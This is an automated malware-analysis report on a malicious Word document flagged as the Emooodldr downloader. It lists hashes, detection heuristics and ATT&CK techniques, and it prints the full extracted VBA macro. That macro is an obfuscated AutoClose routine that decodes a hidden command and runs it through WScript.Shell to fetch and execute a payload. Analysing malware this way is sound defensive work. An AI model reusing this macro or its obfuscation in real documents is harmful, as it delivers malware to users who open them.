Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 b2b0fe8835f5cb0a…

MALICIOUS

Office (OOXML)

36.7 KB Created: 2017-05-22 22:37:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-04-18
MD5: 9ce80da250a8eddd660d36a050c71b82 SHA-1: 92d149b1776c35ddd8255b075e3a74b9ceb7c117 SHA-256: b2b0fe8835f5cb0a941b876b48d7fda262b85b6fec15436e48fdd2003ed914d4
292 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. The AutoClose macro is present and uses WScript.Shell to execute a command. The `medesimo` and `cappero` functions appear to deobfuscate a string which is then passed to `rosolare`, which in turn calls `WScript.Shell.Run`. This indicates the document is designed to download and execute a secondary payload.

Heuristics 8

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(sfarzoso) > 16 Then
    Call CreateObject("WScript.Shell").Run(sfarzoso, vbHide)
  End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(sfarzoso) > 16 Then
    Call CreateObject("WScript.Shell").Run(sfarzoso, vbHide)
  End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
 Call Application.Run("rosolare", cappero("1206483001361130464652143406133908215214133930055207041226363652145106000026253552283430481420433830052152320436213000293430212950304351460830252133293106482546062635410846302822112121123749491748062417483008384439053617483639052905060049400949082126461515152912040522195254302503375342423153405352165222230546451800002930393022334752322126012114420106053036365254302503375342423153405322230546451800002930393022475228343048142043383005215232043621300029343 …
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2646 bytes
SHA-256: 05734534bd9d72672a6bba8cb1b306600ba1751f90df7b243f34039a42fc61b5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function medesimo(sbalzo As Integer) As String
 Dim narciso() As Variant
 narciso = Array("m", "r", "=", "v", "y", "c", "o", "B", "i", "Z", "?", "h", "p", "E", "-", "u", "+", "q", "U", ",", "O", "t", "'", "\", "k", "n", "a", "g", "(", ".", "e", "D", "S", ")", "N", "d", "s", ":", "j", "x", "T", "F", "P", "b", "z", "R", "l", ";", "w", "/", "W", "C", " ", "A", "$")
 Dim tremolio As Integer
 
 For tremolio = LBound(narciso) To UBound(narciso)
   If tremolio = sbalzo Then
    medesimo = narciso(tremolio)
   End If
 Next
 
End Function

Function cappero(Optional chimera As String, Optional chimera2)
  pratica = orzo(Trim(chimera))
  verifica = ""

  For tremolio = 0 To Len(chimera)
    Dim sultano As String
    Dim certo As Integer
    If (tremolio + 1) <= UBound(pratica) Then
    asola = medesimo(Int(pratica(tremolio) + pratica(tremolio + 1)))
    verifica = inarcare(verifica, asola)
    tremolio = tremolio + 1
    End If
  Next
  
  cappero = verifica
End Function


Public Function rosolare(sfarzoso As String)
  If Len(sfarzoso) > 16 Then
    Call CreateObject("WScript.Shell").Run(sfarzoso, vbHide)
  End If
End Function

Sub AutoClose()
 Call Application.Run("rosolare", cappero("12064830013611304646521434061339082152141339300552070412263636521451060000262535522834304814204338300521523204362130002934302129503043514608302521332931064825460626354108463028221121211237494917480624174830083844390536174836390529050600494009490821264615151529120405221952543025033753424231534053521652222305464518000029303930223347523221260121144201060530363652543025033753424231534053222305464518000029303930224752283430481420433830052152320436213000293430212950304351460830252133293106482546062635322101082527282211212112374949174806241748300838443905361748363905290506004936291211121008350208212646151515223347"))
End Sub

Function inarcare(ByVal palazzina As String, ByVal alpaca As String)
 acido = ""
 
 conciso = Array(palazzina, alpaca)
 For acuto = 0 To UBound(conciso)
   acido = acido & "" & conciso(acuto)
 Next
 
 inarcare = acido
End Function



Function orzo(buca As String, Optional edera As Integer) As Variant
    orzo = Split(Left(StrConv(buca, vbUnicode), Len(StrConv(buca, vbUnicode)) - 1), vbNullChar)
End Function

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15872 bytes
SHA-256: 3f3f434e7f9a25f509cdcdb62678c7a0b689158b2159953ca51445c963d7a165
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.